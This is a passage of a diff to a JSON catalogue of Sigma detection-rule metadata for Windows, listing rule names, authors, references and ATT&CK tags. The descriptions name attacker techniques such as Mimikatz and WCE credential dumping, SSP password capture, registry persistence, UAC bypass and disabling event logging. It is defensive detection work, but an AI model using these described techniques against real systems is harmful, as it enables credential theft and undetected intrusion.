+ "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_susp_lsass_dll_load.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", + "https://twitter.com/SBousseaden/status/1183745981189427200", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" ], "tags": [ "attack.execution", - "attack.t1569", + "attack.persistence", + "attack.t1547.008" + ] + }, + "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "value": "DLL Load via LSASS" + }, + { + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "meta": { + "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate modification of screensaver" + ], + "filename": "registry_event_modify_screensaver_binary_path.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" + ] + }, + "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "value": "Path To Screensaver Binary Modified" + }, + { + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "meta": { + "author": "Markus Neis, @markus_neis, Florian Roth", + "creation_date": "2021/07/04", + "falsepositive": [ + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + ], + "filename": "registry_event_mimikatz_printernightmare.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", + "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204", "cve.2021.1675", "cve.2021.34527" ] }, - "uuid": "8fe1c584-ee61-444b-be21-e9054b229694", - "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access" + "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "value": "PrinterNightmare Mimimkatz Driver Name" }, { - "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", "meta": { - "author": "Keith Wright", - "creation_date": "2019/11/20", + "author": "Florian Roth", + "creation_date": "2019/10/01", "falsepositive": [ - "Legitimate administrative activity" + "Software installers downloaded and used by users" ], - "filename": "win_security_external_device.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml" - ], - "tags": [ - "attack.t1091", - "attack.t1200", - "attack.lateral_movement", - "attack.initial_access" - ] - }, - "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", - "value": "External Disk Drive Or USB Storage Device" - }, - { - "description": "Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.", - "meta": { - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", - "creation_date": "2020/05/11", - "falsepositive": [ - "Exclude known DCs." - ], - "filename": "win_security_global_catalog_enumeration.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_global_catalog_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ] - }, - "uuid": "619b020f-0fd7-4f23-87db-3f51ef837a34", - "value": "Enumeration via the Global Catalog" - }, - { - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/04/03", - "falsepositive": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" - ], - "filename": "win_security_gpo_scheduledtasks.yml", + "filename": "registry_event_susp_download_run_key.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/menasec1/status/1106899890377052160", - "https://www.secureworks.com/blog/ransomware-as-a-distraction", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" + "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" ], "tags": [ "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.t1547.001" ] }, - "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "value": "Persistence and Execution at Scale via GPO Scheduled Task" + "uuid": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "value": "Suspicious Run Key from Download" }, { - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", + "meta": { + "author": "Avneet Singh @v3t0_, oscd.community", + "creation_date": "2020/11/15", + "falsepositive": [ + "Legitimate modification of the registry key by legitimate program" + ], + "filename": "registry_event_runonce_persistence.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/990717080805789697", + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", + "value": "Run Once Task Configuration in Registry" + }, + { + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.009" + ] + }, + "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "value": "New DLL Added to AppCertDlls Registry Key" + }, + { + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1182516740955226112", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ] + }, + "uuid": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "value": "Disable Security Events Logging Adding Reg Key MiniNt" + }, + { + "description": "Sysmon registry detection of a local hidden user account.", "meta": { "author": "Christian Burkard", "creation_date": "2021/05/03", "falsepositive": [ "Unknown" ], - "filename": "win_security_hidden_user_creation.yml", + "filename": "registry_event_add_local_hidden_user.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1387743867663958021", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml" + "https://twitter.com/SBousseaden/status/1387530414185664538", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" ], "tags": [ "attack.persistence", "attack.t1136.001" ] }, - "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", - "value": "Hidden Local User Creation" + "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "value": "Creation of a Local Hidden User Account by Registry" }, { - "description": "Rule to detect the Hybrid Connection Manager service installation.", + "description": "Detects the use of Windows Credential Editor (WCE)", "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2021/04/12", - "falsepositive": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." - ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1554" - ] - }, - "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "value": "HybridConnectionManager Service Installation" - }, - { - "description": "Detects execution of Impacket's psexec.py.", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2020/12/14", + "author": "Florian Roth", + "creation_date": "2019/12/31", "falsepositive": [ "Unknown" ], - "filename": "win_security_impacket_psexec.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "registry_event_hack_wce_reg.yml", + "level": "critical", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "32d56ea1-417f-44ff-822b-882873f5f43b", - "value": "Impacket PsExec Execution" - }, - { - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "meta": { - "author": "Samir Bousseaden, wagga", - "creation_date": "2019/04/03", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_impacket_secretdump.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml" + "https://www.ampliasecurity.com/research/windows-credentials-editor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" ], "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" - ] - }, - "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "value": "Possible Impacket SecretDump Remote Activity" - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", - "value": "Invoke-Obfuscation CLIP+ Launcher - Security" - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "meta": { - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "creation_date": "2019/11/08", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security" - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", - "value": "Invoke-Obfuscation STDIN+ Launcher - Security" - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", - "value": "Invoke-Obfuscation VAR+ Launcher - Security" - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security" - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security" - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "value": "Invoke-Obfuscation Via Stdin - Security" - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", - "value": "Invoke-Obfuscation Via Use Clip - Security" - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "value": "Invoke-Obfuscation Via Use MSHTA - Security" - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", - "value": "Invoke-Obfuscation Via Use Rundll32 - Security" - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security" - }, - { - "description": "Detects the mount of ISO images on an endpoint", - "meta": { - "author": "Syed Hasan (@syedhasan009)", - "creation_date": "2021/05/29", - "falsepositive": [ - "Software installation ISO files" - ], - "filename": "win_security_iso_mount.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", - "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", - "https://twitter.com/MsftSecIntel/status/1257324139515269121", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", - "value": "ISO Image Mount" - }, - { - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/04/03", - "falsepositive": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" - ], - "filename": "win_security_lm_namedpipe.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/menasec1/status/1104489274387451904", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", - "value": "First Time Seen Remote Named Pipe" - }, - { - "description": "The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.", - "meta": { - "author": "Arun Chauhan", - "creation_date": "2021/10/04", - "falsepositive": [ - "Red team activity", - "Rare legitimate use by an administrator" - ], - "filename": "win_security_lolbas_execution_of_nltest.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", - "https://attack.mitre.org/software/S0359/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482", - "attack.t1018", - "attack.t1016" - ] - }, - "uuid": "eeb66bbb-3dde-4582-815a-584aee9fe6d1", - "value": "Correct Execution of Nltest.exe" - }, - { - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_lsass_access_non_system_account.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", - "value": "LSASS Access from Non System Account" - }, - { - "description": "Detects well-known credential dumping tools execution via service execution events", - "meta": { - "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2017/03/05", - "falsepositive": [ - "Legitimate Administrator using credential dumping tool for password recovery" - ], - "filename": "win_security_mal_creddumper.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", "attack.s0005" ] }, - "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "value": "Credential Dumping Tools Service Execution - Security" + "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "value": "Windows Credential Editor Registry" }, { - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", "meta": { - "author": "Florian Roth, Daniil Yugoslavskiy, oscd.community (update)", - "creation_date": "2017/03/27", + "author": "iwillkeepwatch", + "creation_date": "2019/01/18", "falsepositive": [ - "Unknown" + "Unlikely" ], - "filename": "win_security_mal_service_installs.yml", + "filename": "registry_event_ssp_added_lsa_config.yml", "level": "critical", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://awakesecurity.com/blog/threat-hunting-for-paexec/", - "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", - "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" + "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" ], "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1547.005" ] }, - "uuid": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "value": "Malicious Service Installations" + "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "value": "Security Support Provider (SSP) Added to LSA Configuration" }, { - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/06/14", + "author": "Aidan Bracher", + "creation_date": "2020/07/07", + "falsepositive": "No established falsepositives", + "filename": "registry_event_apt_leviathan.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "70d43542-cd2d-483c-8f30-f16b436fd7db", + "value": "Leviathan Registry Key Activity" + }, + { + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "meta": { + "author": "megan201296, Jonhnathan Ribeiro", + "creation_date": "2019/04/14", "falsepositive": [ "Unknown" ], - "filename": "win_security_mal_wceaux_dll.yml", + "filename": "registry_event_apt_oceanlotus_registry.yml", "level": "critical", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://github.com/eset/malware-ioc/tree/master/oceanlotus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" ], "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.defense_evasion", + "attack.t1112" ] }, - "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", - "value": "WCE wceaux.dll Access" + "uuid": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "value": "OceanLotus Registry Activity" }, { - "description": "Alerts on Metasploit host's authentications on the domain.", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", "meta": { - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", - "creation_date": "2020/05/06", + "author": "oscd.community, Dmitry Uchakin", + "creation_date": "2020/10/07", "falsepositive": [ - "Linux hostnames composed of 16 characters." + "Unknown" ], - "filename": "win_security_metasploit_authentication.yml", + "filename": "registry_event_bypass_via_wsreset.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "72124974-a68b-4366-b990-d30e0b2a190d", - "value": "Metasploit SMB Authentication" - }, - { - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "meta": { - "author": "Bartlomiej Czyz, Relativity", - "creation_date": "2021/01/21", - "falsepositive": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" - ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://bczyz1.github.io/2021/01/30/psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": 